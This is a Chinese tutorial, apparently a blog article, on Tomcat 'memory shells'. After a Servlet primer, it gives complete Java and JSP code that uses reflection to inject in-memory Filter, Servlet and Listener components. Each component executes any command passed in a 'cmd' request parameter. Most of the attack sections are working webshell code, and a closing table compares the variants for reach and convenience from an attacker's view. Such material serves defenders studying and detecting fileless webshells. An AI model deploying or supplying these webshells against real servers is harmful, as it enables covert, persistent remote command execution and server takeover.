https://mp.weixin.qq.com/s/-jXAHHRCRilHrNN49QBcjQ

Servlet web介绍

Java Servlet 是运行在 Web 服务器或应用服务器上的程序,它是作为来自 Web 浏览器或其他 HTTP 客户端的请求和 HTTP 服务器上的数据库或应用程序之间的中间层。
使用 Servlet,您可以收集来自网页表单的用户输入,呈现来自数据库或者其他源的记录,还可以动态创建网页。
Java Servlet 通常情况下与使用 CGI(Common Gateway Interface,公共网关接口)实现的程序可以达到异曲同工的效果。但是相比于 CGI,Servlet 有以下几点优势

  • 性能明显更好。
  • Servlet 在 Web 服务器的地址空间内执行。这样它就没有必要再创建一个单独的进程来处理每个客户端请求。
  • Servlet 是独立于平台的,因为它们是用 Java 编写的。
  • 服务器上的 Java 安全管理器执行了一系列限制,以保护服务器计算机上的资源。因此,Servlet 是可信的。
  • Java 类库的全部功能对 Servlet 来说都是可用的。它可以通过 sockets 和 RMI 机制与 applets、数据库或其他软件进行交互。

Tomcat内存马基础入门 - 图1

创建第一个Servlet web application

step 1:使用idea 创建一个 web Application

image.png

step 2:添加相关的依赖包($tomcat/lib/servlet-api.jar)

右键项目 Open Moudle Setting 或者如下箭头的快捷键,添加依赖($tomcat/lib/.jar)
image.png
image.png

step 3:新建Servlet

image.png
image.png
image.png

step 4:配置Tomcat

image.png
image.png
image.png
这里有告警,说没有artifacts,首先确定是否Project Structure 下 Module里是否包含我们的项目
image.png
以及artifacts里是否有
image.png
确定都有再点fix
image.png
image.png

step 5:启动项目

在创建的Servlet(Helloworld.class)中填写如下代码

  1. import javax.servlet.ServletException;
  2. import javax.servlet.annotation.WebServlet;
  3. import javax.servlet.http.HttpServlet;
  4. import javax.servlet.http.HttpServletRequest;
  5. import javax.servlet.http.HttpServletResponse;
  6. import java.io.IOException;
  7. import java.io.PrintWriter;
  8. @WebServlet(name = "HelloWorld")
  9. public class HelloWorld extends HttpServlet {
  10. private String message;
  11. public void init() throws ServletException{
  12. message = "This is my first Servlet Application";
  13. }
  14. protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
  15. }
  16. protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
  17. // 设置:响应内容类型
  18. response.setContentType("text/html");
  19. // 输出文本
  20. PrintWriter out = response.getWriter();
  21. out.write("<h1> " + message + " </h1>");
  22. }
  23. }

然后配置web.xml

  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  3. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4. xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  5. version="4.0">
  6. <servlet>
  7. <servlet-name>HelloWorld</servlet-name>
  8. <servlet-class>HelloWorld</servlet-class>
  9. </servlet>
  10. <servlet-mapping>
  11. <servlet-name>HelloWorld</servlet-name>
  12. <url-pattern>/hello</url-pattern>
  13. </servlet-mapping>
  14. </web-app>

然后回到HelloWorld.class,启动web
image.png
image.png

Filter 动态注入内存

Filter是java web中的过滤器,会对客户端发送的请求进行过滤并做一些操作,我们可以在filter中写入命令执行的恶意文件,让客户端请求它来完成命令执行;
Filter 内存马是通过动态注册以一个恶意Filter,由于是动态注册的,所以这个filter没有文件实体,存在内存中,当tomcat重启就消失了(恕我直言,解决内存马最好的办法就是重启)
一般我们把这个Filter放在所有的filter最前面优先执行,这样我们的请求就不会受到其他filter的干扰

需要动态注册filter就需要添加filter相关的函数

ServletContext

javax.servlet.servletContext中存在addFilter,addServlet,addListener方法,即添加Filter,Servlet,Listener
this.getServletContext();this.getServletConfig().getServletContext(); 是获取ServletContext的方法

ApplicationContext

在Tomcat中,org.apache.catalina.core.ApplicationContext中包含一个ServletContext接口的实现,所以需要引入org.apache.catalina.core.ApplicationContext这个库,用它获取Context

Filter相关变量

  • filterMaps 变量:包含所有过滤器的URL映射关系
  • filterDefs 变量:包含所有过滤器包括实例内部等变量
  • filterConfigs 变量:包含所有与过滤器对应的filterDef信息及过滤器实例,进行过滤器进行管理

org.apache.catalina.core.ApplicationFilterConfig 在tomcat不同版本需要通过不同的库引入FilterMap和FilterDef

  1. import org.apache.catalina.deploy.FilterMap;
  2. import org.apache.catalina.deploy.FilterDef;
  1. // tomcat 8/9
  2. import org.apache.tomcat.util.descriptor.web.FilterDef;
  3. import org.apache.tomcat.util.descriptor.web.FilterMap;

创建一个Filter,查看结构

  1. package Filter;
  2. import javax.servlet.*;
  3. import javax.servlet.annotation.WebFilter;
  4. import java.io.IOException;
  5. @WebFilter(filterName = "FilterDemo")
  6. public class FilterDemo implements Filter {
  7. public void destroy() {
  8. }
  9. public void doFilter(ServletRequest req, ServletResponse resp, FilterChain chain) throws ServletException, IOException {
  10. System.out.println("exec filter");
  11. chain.doFilter(req,resp);
  12. }
  13. public void init(FilterConfig config) throws ServletException {
  14. System.out.println("init filter");
  15. }
  16. }

FilterDemo中有init,doFilter,destory三个重要方法

  1. init()方法:初始化参数,在创建Filter时自动调用,当我们需要设置初始化参数的时候,可以写到该方法中。
  2. doFilter()方法:拦截到要执行的请求时,doFilter就会执行。这里面写我们对请求和响应的预处理
  3. destory()方法:在销毁Filter时自动调用

对我们来说,init和destory不需要做什么,只需要写一个doFilter方法拦截需要的请求,将其参数用于Runtime.getRuntime().exec()做命令执行,并将返回的数据打印到Response中即可,如下例:

  1. public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
  2. String cmd = servletRequest.getParameter("cmd");
  3. if (cmd!= null) {
  4. Process process = Runtime.getRuntime().exec(cmd);
  5. java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
  6. new java.io.InputStreamReader(process.getInputStream()));
  7. StringBuilder stringBuilder = new StringBuilder();
  8. String line;
  9. while ((line = bufferedReader.readLine()) != null) {
  10. stringBuilder.append(line + '\n');
  11. }
  12. servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
  13. servletResponse.getOutputStream().flush();
  14. servletResponse.getOutputStream().close();
  15. return;
  16. }
  17. filterChain.doFilter(servletRequest, servletResponse);
  18. }

动态注入

我们将filter部分写好,下一步就是实现将其注入到内存中

  1. protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
  2. PrintWriter out = response.getWriter();
  3. ServletContext servletContext = request.getSession().getServletContext();
  4. try{
  5. Field appctx = servletContext.getClass().getDeclaredField("context");
  6. appctx.setAccessible(true);
  7. ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
  8. Field stdctx = applicationContext.getClass().getDeclaredField("context");
  9. stdctx.setAccessible(true);
  10. StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
  11. Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
  12. Configs.setAccessible(true);
  13. Map filterConfigs = (Map) Configs.get(standardContext);
  14. String name = "filterDemo";
  15. //判断是否存在filterDemo这个filter,如果没有则准备创建
  16. if (filterConfigs.get(name) == null){
  17. //定义一些基础属性、类名、filter名等
  18. FilterDemo filter = new FilterDemo();
  19. FilterDef filterDef = new FilterDef();
  20. filterDef.setFilterName(name);
  21. filterDef.setFilterClass(filter.getClass().getName());
  22. filterDef.setFilter(filter);
  23. //添加filterDef
  24. standardContext.addFilterDef(filterDef);
  25. //创建filterMap,设置filter和url的映射关系,可设置成单一url如/xyz ,也可以所有页面都可触发可设置为/*
  26. FilterMap filterMap = new FilterMap();
  27. // filterMap.addURLPattern("/*");
  28. filterMap.addURLPattern("/xyz");
  29. filterMap.setFilterName(name);
  30. filterMap.setDispatcher(DispatcherType.REQUEST.name());
  31. //添加我们的filterMap到所有filter最前面
  32. standardContext.addFilterMapBefore(filterMap);
  33. //反射创建FilterConfig,传入standardContext与filterDef
  34. Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
  35. constructor.setAccessible(true);
  36. ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
  37. //将filter名和配置好的filterConifg传入
  38. filterConfigs.put(name,filterConfig);
  39. out.write("Inject success!");
  40. }
  41. else{
  42. out.write("Injected!");
  43. }
  44. }catch(Exception e){
  45. e.printStackTrace();
  46. }
  47. }

image.png
image.png
image.png
image.png

JSP

  1. <%@ page contentType="text/html;charset=UTF-8" language="java" %>
  2. <%@ page import = "org.apache.catalina.Context" %>
  3. <%@ page import = "org.apache.catalina.core.ApplicationContext" %>
  4. <%@ page import = "org.apache.catalina.core.ApplicationFilterConfig" %>
  5. <%@ page import = "org.apache.catalina.core.StandardContext" %>
  6. <%@ page import = "javax.servlet.*" %>
  7. <%@ page import = "java.io.IOException" %>
  8. <%@ page import = "java.lang.reflect.Constructor" %>
  9. <%@ page import = "java.lang.reflect.Field" %>
  10. <%@ page import = "java.util.Map" %>
  11. <!-- tomcat8/9 我这里测试环境是tomcat9,请根据实际情况更改引入的包-->
  12. <%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
  13. <%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
  14. <%
  15. class filterDemo implements Filter {
  16. @Override
  17. public void init(FilterConfig filterConfig) throws ServletException {
  18. }
  19. public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
  20. String cmd = servletRequest.getParameter("cmd");
  21. if (cmd!= null) {
  22. Process process = Runtime.getRuntime().exec(cmd);
  23. java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
  24. new java.io.InputStreamReader(process.getInputStream()));
  25. StringBuilder stringBuilder = new StringBuilder();
  26. String line;
  27. while ((line = bufferedReader.readLine()) != null) {
  28. stringBuilder.append(line + '\n');
  29. }
  30. servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
  31. servletResponse.getOutputStream().flush();
  32. servletResponse.getOutputStream().close();
  33. return;
  34. }
  35. filterChain.doFilter(servletRequest, servletResponse);
  36. }
  37. @Override
  38. public void destroy() {
  39. }
  40. }
  41. %>
  42. <%
  43. //从org.apache.catalina.core.ApplicationContext反射获取context方法
  44. ServletContext servletContext = request.getSession().getServletContext();
  45. Field appctx = servletContext.getClass().getDeclaredField("context");
  46. appctx.setAccessible(true);
  47. ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
  48. Field stdctx = applicationContext.getClass().getDeclaredField("context");
  49. stdctx.setAccessible(true);
  50. StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
  51. Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
  52. Configs.setAccessible(true);
  53. Map filterConfigs = (Map) Configs.get(standardContext);
  54. String name = "filterDemo";
  55. //判断是否存在filterDemo1这个filter,如果没有则准备创建
  56. if (filterConfigs.get(name) == null){
  57. //定义一些基础属性、类名、filter名等
  58. filterDemo filter = new filterDemo();
  59. FilterDef filterDef = new FilterDef();
  60. filterDef.setFilterName(name);
  61. filterDef.setFilterClass(filter.getClass().getName());
  62. filterDef.setFilter(filter);
  63. //添加filterDef
  64. standardContext.addFilterDef(filterDef);
  65. //创建filterMap,设置filter和url的映射关系,可设置成单一url如/xyz ,也可以所有页面都可触发可设置为/*
  66. FilterMap filterMap = new FilterMap();
  67. // filterMap.addURLPattern("/*");
  68. // 这里可根据实际情况添加拦截器拦截的路由
  69. filterMap.addURLPattern("/xyz");
  70. filterMap.setFilterName(name);
  71. filterMap.setDispatcher(DispatcherType.REQUEST.name());
  72. //添加我们的filterMap到所有filter最前面
  73. standardContext.addFilterMapBefore(filterMap);
  74. //反射创建FilterConfig,传入standardContext与filterDef
  75. Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
  76. constructor.setAccessible(true);
  77. ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
  78. //将filter名和配置好的filterConifg传入
  79. filterConfigs.put(name,filterConfig);
  80. out.write("Inject success!");
  81. }
  82. else{
  83. out.write("Injected!");
  84. }
  85. %>

Servlet 动态注入内存

要了解Servlet动态注入内存,那么就需要对Servlet的生命周期要有一定的了解

Servlet 生命周期

Servlet 生命周期可被定义为从创建直到毁灭的整个过程。以下是 Servlet 遵循的过程:

  • Servlet 初始化后调用 init () 方法。
  • Servlet 调用 service() 方法来处理客户端的请求。
  • Servlet 销毁前调用 destroy() 方法。
  • 最后,Servlet 是由 JVM 的垃圾回收器进行垃圾回收的。

image.png

init() 方法

init 方法被设计成只调用一次。它在第一次创建 Servlet 时被调用,在后续每次用户请求时不再调用。因此,它是用于一次性初始化,就像 Applet 的 init 方法一样。
Servlet 创建于用户第一次调用对应于该 Servlet 的 URL 时,但是您也可以指定 Servlet 在服务器第一次启动时被加载。
当用户调用一个 Servlet 时,就会创建一个 Servlet 实例,每一个用户请求都会产生一个新的线程,适当的时候移交给 doGet 或 doPost 方法。init() 方法简单地创建或加载一些数据,这些数据将被用于 Servlet 的整个生命周期

service() 方法

service() 方法是执行实际任务的主要方法。Servlet 容器(即 Web 服务器)调用 service() 方法来处理来自客户端(浏览器)的请求,并把格式化的响应写回给客户端。
每次服务器接收到一个 Servlet 请求时,服务器会产生一个新的线程并调用服务。service() 方法检查 HTTP 请求类型(GET、POST、PUT、DELETE 等),并在适当的时候调用 doGet、doPost、doPut,doDelete 等方法

service() 方法由容器调用,service 方法在适当的时候调用 doGet、doPost、doPut、doDelete 等方法。所以,您不用对 service() 方法做任何动作,您只需要根据来自客户端的请求类型来重写 doGet() 或 doPost() 即可。
doGet() 和 doPost() 方法是每次服务请求中最常用的方法

doGet() 方法

GET 请求来自于一个 URL 的正常请求,或者来自于一个未指定 METHOD 的 HTML 表单,它由 doGet() 方法处理

doPost() 方法

POST 请求来自于一个特别指定了 METHOD 为 POST 的 HTML 表单,它由 doPost() 方法处理

destroy() 方法

destroy() 方法只会被调用一次,在 Servlet 生命周期结束时被调用。destroy() 方法可以让您的 Servlet 关闭数据库连接、停止后台线程、把 Cookie 列表或点击计数器写入到磁盘,并执行其他类似的清理活动。
在调用 destroy() 方法之后,servlet 对象被标记为垃圾回收

service方法

在service方法中,Servlet容器在此生命周期中会处理每次来的请求,就像是“拦截器”一般

  1. // ServletTest
  2. import javax.servlet.ServletException;
  3. import javax.servlet.ServletRequest;
  4. import javax.servlet.ServletResponse;
  5. import javax.servlet.annotation.WebServlet;
  6. import javax.servlet.http.HttpServlet;
  7. import javax.servlet.http.HttpServletRequest;
  8. import javax.servlet.http.HttpServletResponse;
  9. import java.io.IOException;
  10. import java.io.PrintWriter;
  11. @WebServlet(name = "ServletTest")
  12. public class ServletTest extends HttpServlet {
  13. @Override
  14. public void init() throws ServletException {
  15. System.out.println("init");
  16. }
  17. @Override
  18. public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
  19. System.out.println("Servlet Service Test");
  20. }
  21. protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
  22. }
  23. protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
  24. // 设置:响应内容类型
  25. response.setContentType("text/html");
  26. // 输出文本
  27. PrintWriter out = response.getWriter();
  28. out.write("<h1> Test </h1>");
  29. }
  30. }
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  3. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4. xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  5. version="4.0">
  6. <servlet>
  7. <servlet-name>Helloworld</servlet-name>
  8. <servlet-class>Helloworld</servlet-class>
  9. </servlet>
  10. <servlet-mapping>
  11. <servlet-name>Helloworld</servlet-name>
  12. <url-pattern>/hello</url-pattern>
  13. </servlet-mapping>
  14. <servlet>
  15. <servlet-name>ServletTest</servlet-name>
  16. <servlet-class>ServletTest</servlet-class>
  17. </servlet>
  18. <servlet-mapping>
  19. <servlet-name>ServletTest</servlet-name>
  20. <url-pattern>/test</url-pattern>
  21. </servlet-mapping>
  22. </web-app>

可以看到每刷新一次,就会打印service生命周期中的Servlet Service Test,而最重要的是没有进入doGet(),相信大家也明白什么意思了

动态注入

我们在service中写入恶意代码,这里还是以ServletTest.java文件为例,已删除web.xml中ServletTest的路由了

  1. import javax.servlet.ServletException;
  2. import javax.servlet.ServletRequest;
  3. import javax.servlet.ServletResponse;
  4. import javax.servlet.annotation.WebServlet;
  5. import javax.servlet.http.HttpServlet;
  6. import javax.servlet.http.HttpServletRequest;
  7. import javax.servlet.http.HttpServletResponse;
  8. import java.io.IOException;
  9. @WebServlet(name = "ServletTest")
  10. public class ServletTest extends HttpServlet {
  11. @Override
  12. public void init() throws ServletException {
  13. System.out.println("init");
  14. }
  15. @Override
  16. public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
  17. String cmd = servletRequest.getParameter("cmd");
  18. if (cmd != null) {
  19. Process process = Runtime.getRuntime().exec(cmd);
  20. java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
  21. new java.io.InputStreamReader(process.getInputStream()));
  22. StringBuilder stringBuilder = new StringBuilder();
  23. String line;
  24. while ((line = bufferedReader.readLine()) != null) {
  25. stringBuilder.append(line + '\n');
  26. }
  27. servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
  28. servletResponse.getOutputStream().flush();
  29. servletResponse.getOutputStream().close();
  30. return;
  31. }
  32. }
  33. protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
  34. }
  35. protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
  36. }
  37. }

获取context部分与filter中相同,仍然从org.apache.catalina.core.ApplicationContext反射获取

  1. ServletContext servletContext = request.getSession().getServletContext();
  2. Field appctx = servletContext.getClass().getDeclaredField("context");
  3. appctx.setAccessible(true);
  4. ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
  5. Field stdctx = applicationContext.getClass().getDeclaredField("context");
  6. stdctx.setAccessible(true);
  7. StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);

然后需要将上文写的servlet封装成wrapper再使用context添加

  1. ServletTest demo = new ServletTest();
  2. org.apache.catalina.Wrapper wrapper = standardContext.createWrapper();
  3. wrapper.setName("xyz");
  4. wrapper.setLoadOnStartup(1);
  5. wrapper.setServlet(demo);
  6. wrapper.setServletClass(demo.getClass().getName());
  7. standardContext.addChild(wrapper);
  8. standardContext.addServletMapping("/xyz","xyz");
  9. out.println("injected Servlet success!");

在Helloworld 这个servlet中,我们将代码写入

  1. import org.apache.catalina.Wrapper;
  2. import org.apache.catalina.core.ApplicationContext;
  3. import org.apache.catalina.core.StandardContext;
  4. import javax.servlet.ServletContext;
  5. import javax.servlet.ServletException;
  6. import java.io.IOException;
  7. import java.io.PrintWriter;
  8. import java.lang.reflect.Field;
  9. public class Helloworld extends javax.servlet.http.HttpServlet {
  10. private String message;
  11. public void init() throws ServletException{
  12. message = "This is my first servlet application";
  13. }
  14. protected void doPost(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws javax.servlet.ServletException, IOException {
  15. }
  16. protected void doGet(javax.servlet.http.HttpServletRequest request, javax.servlet.http.HttpServletResponse response) throws javax.servlet.ServletException, IOException {
  17. PrintWriter out = response.getWriter();
  18. try {
  19. ServletContext servletContext = request.getSession().getServletContext();
  20. Field appctx = servletContext.getClass().getDeclaredField("context");
  21. appctx.setAccessible(true);
  22. ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
  23. Field stdctx = applicationContext.getClass().getDeclaredField("context");
  24. stdctx.setAccessible(true);
  25. StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
  26. ServletTest demo = new ServletTest();
  27. Wrapper wrapper = standardContext.createWrapper();
  28. wrapper.setName("xyz");
  29. wrapper.setLoadOnStartup(1);
  30. wrapper.setServlet(demo);
  31. wrapper.setServletClass(demo.getClass().getName());
  32. standardContext.addChild(wrapper);
  33. // 这里是增加ServletMapping
  34. standardContext.addServletMapping("/xyz","xyz");
  35. out.println("injected Servlet success!");
  36. }catch (Exception e){
  37. e.printStackTrace();
  38. }
  39. }
  40. }

效果如下:
image.png
image.png

JSP

  1. <%@ page contentType="text/html;charset=UTF-8" language="java" %>
  2. <%@ page import = "org.apache.catalina.core.ApplicationContext"%>
  3. <%@ page import = "org.apache.catalina.core.StandardContext"%>
  4. <%@ page import = "javax.servlet.*"%>
  5. <%@ page import = "java.io.IOException"%>
  6. <%@ page import = "java.lang.reflect.Field"%>
  7. <%
  8. class ServletDemo implements Servlet{
  9. @Override
  10. public void init(ServletConfig config) throws ServletException {}
  11. @Override
  12. public String getServletInfo() {return null;}
  13. @Override
  14. public void destroy() {} public ServletConfig getServletConfig() {return null;}
  15. @Override
  16. public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
  17. String cmd = servletRequest.getParameter("cmd");
  18. if (cmd != null) {
  19. Process process = Runtime.getRuntime().exec(cmd);
  20. java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
  21. new java.io.InputStreamReader(process.getInputStream()));
  22. StringBuilder stringBuilder = new StringBuilder();
  23. String line;
  24. while ((line = bufferedReader.readLine()) != null) {
  25. stringBuilder.append(line + '\n');
  26. }
  27. servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
  28. servletResponse.getOutputStream().flush();
  29. servletResponse.getOutputStream().close();
  30. return;
  31. }
  32. }
  33. }
  34. %>
  35. <%
  36. ServletContext servletContext = request.getSession().getServletContext();
  37. Field appctx = servletContext.getClass().getDeclaredField("context");
  38. appctx.setAccessible(true);
  39. ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
  40. Field stdctx = applicationContext.getClass().getDeclaredField("context");
  41. stdctx.setAccessible(true);
  42. StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
  43. ServletDemo demo = new ServletDemo();
  44. org.apache.catalina.Wrapper demoWrapper = standardContext.createWrapper();
  45. //设置Servlet名等
  46. demoWrapper.setName("xyz");
  47. demoWrapper.setLoadOnStartup(1);
  48. demoWrapper.setServlet(demo);
  49. demoWrapper.setServletClass(demo.getClass().getName());
  50. standardContext.addChild(demoWrapper);
  51. //设置ServletMap
  52. standardContext.addServletMapping("/abc", "xyz");
  53. out.println("inject servlet success!");
  54. %>

遇到500 不要慌,访问/abc试一试
image.png
image.png

Listener 动态注入内存

监听器就是监听某个对象的的状态变化的组件,监听器的相关概念:

  • 事件源:被监听的对象 ——- 三个域对象 request session servletContext
  • 监听器:监听事件源对象 事件源对象的状态的变化都会触发监听器
  • 注册监听器:将监听器与事件源进行绑定
  • 响应行为:监听器监听到事件源的状态变化时 所涉及的功能代码

    ServletRequestListener 接口

    该接口实现的方法有requestDestroyedrequestInitialized,分别是在监听request请求结束,以及request请求开始,我们着重看请求开始的部分 ```java import javax.servlet.ServletRequestEvent; import javax.servlet.ServletRequestListener;

public class ListenerDemo implements ServletRequestListener { @Override public void requestDestroyed(ServletRequestEvent servletRequestEvent) {

  1. }
  2. @Override
  3. public void requestInitialized(ServletRequestEvent servletRequestEvent) {
  4. }

}

  1. `requestInitialized`这个函数中,我们从`servletRequestEvent`参数中取cmd参数,在当前上下文只要在任意路由下监听到了cmd参数存在值,那么就执行命令,具体操作如下
  2. ```java
  3. public void requestInitialized(ServletRequestEvent servletRequestEvent) {
  4. String cmd = servletRequestEvent.getServletRequest().getParameter("cmd");
  5. if(cmd != null){
  6. try {
  7. Runtime.getRuntime().exec(cmd);
  8. } catch (IOException e) {}
  9. }
  10. }

注意,这里是无回显的

动态注入

在Helloworld这个Servlet中,获取context,并将listener添加进去,具体如下

  1. ServletContext servletContext = request.getSession().getServletContext();
  2. Field appctx = servletContext.getClass().getDeclaredField("context");
  3. appctx.setAccessible(true);
  4. ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
  5. Field stdctx = applicationContext.getClass().getDeclaredField("context");
  6. stdctx.setAccessible(true);
  7. StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
  8. ListenerDemo listenerDemo = new ListenerDemo();
  9. standardContext.addApplicationEventListener(listenerDemo);
  10. out.println("inject success");

因为无回显,所以我们只能执行命令,如弹出计算器
image.png

JSP

  1. <%@ page contentType="text/html;charset=UTF-8" language="java" %>
  2. <%@ page import="org.apache.catalina.core.ApplicationContext" %>
  3. <%@ page import="org.apache.catalina.core.StandardContext" %>
  4. <%@ page import="javax.servlet.*" %>
  5. <%@ page import="javax.servlet.annotation.WebServlet" %>
  6. <%@ page import="javax.servlet.http.HttpServlet" %>
  7. <%@ page import="javax.servlet.http.HttpServletRequest" %>
  8. <%@ page import="javax.servlet.http.HttpServletResponse" %>
  9. <%@ page import="java.io.IOException" %>
  10. <%@ page import="java.lang.reflect.Field" %>
  11. <%
  12. class S implements ServletRequestListener{
  13. @Override
  14. public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
  15. }
  16. @Override
  17. public void requestInitialized(ServletRequestEvent servletRequestEvent) {
  18. String cmd = servletRequestEvent.getServletRequest().getParameter("cmd");
  19. if(cmd != null){
  20. try {
  21. Runtime.getRuntime().exec(cmd);
  22. } catch (IOException e) {}
  23. }
  24. }
  25. }
  26. %>
  27. <%
  28. ServletContext servletContext = request.getSession().getServletContext();
  29. Field appctx = servletContext.getClass().getDeclaredField("context");
  30. appctx.setAccessible(true);
  31. ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext);
  32. Field stdctx = applicationContext.getClass().getDeclaredField("context");
  33. stdctx.setAccessible(true);
  34. StandardContext standardContext = (StandardContext) stdctx.get(applicationContext);
  35. S servletRequestListener = new S();
  36. standardContext.addApplicationEventListener(servletRequestListener);
  37. out.println("inject success");
  38. %>

总结

以上三种根据Servlet的特性,动态注入,jsp文件只要落地,即可动态加载到内存中

姿势 优点 缺点
Filter
1. 通过添加全局拦截器对参数进行拦截,来进行恶意代码执行
1. 通过添加filtermap,可以随便设置路由,所有请求都会过该拦截器

1. 引入filterMapsfilterDef,要根据tomcat版本来判断
1. 代码量较高
Servlet
1. 简单方便,了解Servlet生命周期即可
1. 更直观了解如何动态添加ServletMapping

1. 无法使所有参数都经过恶意代码,只能在我们自己设定的url中才能触发
Listener
1. 简单方便,通过添加监听器对request进行监控
1. 在任意url中都能设置我们监听的参数

1. 只要监听的参数含有就会进入监听代码中
1. 如果在该jsp页面下访问,则会重放请求